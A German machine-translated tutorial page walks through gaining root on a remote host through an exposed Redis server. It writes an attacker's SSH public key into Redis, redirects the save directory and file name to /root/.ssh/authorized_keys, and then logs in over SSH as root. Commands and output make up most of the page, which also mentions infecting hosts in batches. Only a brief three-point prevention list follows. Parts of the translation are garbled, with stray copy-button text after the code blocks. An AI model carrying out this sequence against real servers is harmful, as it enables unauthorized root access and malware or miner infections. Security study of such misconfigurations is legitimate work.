Heim > Datenbank > Redis > Lassen Sie uns über die Prinzipien des Redis-Mining sprechen (detaillierte Beispiele)

Lassen Sie uns über die Prinzipien des Redis-Mining sprechen (detaillierte Beispiele)

WBOY
Freigeben: 2022-02-23 17:58:08
nach vorne
3256 Leute haben es durchsucht

Dieser Artikel vermittelt Ihnen relevantes Wissen über das Mining-Prinzip von Redis. Hier zeigen wir, wie Sie mit Redis Berechtigungen erweitern, um den Root-Benutzer des Remote-Servers zu erhalten, und wie Sie ihn schützen können alle.

Lassen Sie uns über die Prinzipien des Redis-Mining sprechen (detaillierte Beispiele)

Empfohlenes Lernen: Redis-Video-Tutorial

Heute zeigen wir, wie man den Root-Benutzer des Remote-Servers durch Rechteausweitung über Redis erhält.

1. Zuerst brauchen wir einige Voraussetzungen

  • Bedingung 1: Sie müssen zuerst einen Redis haben und wir müssen seinen Port kennen [Standard 6379];

  • Bedingung 2: Redis-Passwort darf nicht zu komplex sein , oder kein Passwort;

  • Bedingung 3: Der Benutzer, der Redis startet, ist vorzugsweise ein Root-Benutzer, was destruktiver ist; 2.1 Erstellen Sie ein Paar Geheimnisse Der Schlüssel

wird über ssh-keygen generiert. Natürlich können Sie den vorhandenen problemlos verwenden.

root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Nach dem Login kopieren
Als nächstes wird der Angriffsschlüsselwert über den öffentlichen Schlüssel generiert
    (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
    Nach dem Login kopieren
  • Der Inhalt ist wie folgt

    root@kali:/tmp/rediskey# cat foo.txt
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
    Nach dem Login kopieren
    Der Zweck des Hinzufügens von zwei Zeilenumbrüchen davor und danach besteht darin, zu verhindern, dass die Daten miteinander verbunden werden und Fehlerprobleme verursachen.
  • 2.2 Schlüssel für Redis konfigurieren

    Der Vorgang ist wie folgt:

    root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
    OK
    Nach dem Login kopieren
    Melden Sie sich bei Redis an, um zu überprüfen, ob er in Redis geschrieben wurde.
      root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
      192.168.243.129:6379> get bar
      "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
      Nach dem Login kopieren
    • 2.3 Systemdateien über den Redis-Speichermechanismus ersetzen

    • Sehen wir uns die folgenden Vorgänge an

      192.168.243.129:6379> config set dir /root/.ssh
      OK
      192.168.243.129:6379> config get dir
      1) "dir"
      2) "/root/.ssh"
      192.168.243.129:6379> config set dbfilename "authorized_keys"
      OK
      192.168.243.129:6379> save
      OK
      192.168.243.129:6379> exit
      Nach dem Login kopieren
      Zu diesem Zeitpunkt melden wir uns beim Remote-Host an, um den Effekt zu sehen.
        root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
        The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
        ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
        Are you sure you want to continue connecting (yes/no)? yes
        Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
        Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64
        
        Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
        root@kali:~#
        Nach dem Login kopieren
      • OK, jetzt haben wir die Rechte erfolgreich eskaliert, also werfen wir einen Blick auf die exportierte Datei? Tatsächlich handelt es sich nur um die gespeicherte Dateiform von Redis. Wenn Sie interessiert sind, können Sie sie selbst öffnen und sehen. Sie wird hier nicht angezeigt.

        3. So verhindern Sie

      • Jetzt haben wir nur eine Host-Berechtigung, um einige Skripte auszuführen und sie dann stapelweise zu infizieren.

        Die Tipps zur Vorbeugung lauten wie folgt:

        Redis sollte nicht auf gefährliche IPs hören.

        Redis muss die Passwortbeschränkungen erhöhen und es darf kein schwaches Passwort sein

        Redis sollte versuchen, es nicht als Root-Benutzer zu verwenden.

          Befolgen Sie die oben genannten drei Punkte, um Redis-Mining zu verhindern, kein Problem
        • Empfohlenes Lernen:

          Redis-Video-Tutorial

        Das obige ist der detaillierte Inhalt vonLassen Sie uns über die Prinzipien des Redis-Mining sprechen (detaillierte Beispiele). Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

        Verwandte Etiketten:
        Quelle:csdn.net
        Erklärung dieser Website
        Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
        Neueste Downloads
        Mehr>
        Web-Effekte
        Quellcode der Website
        Website-Materialien
        Frontend-Vorlage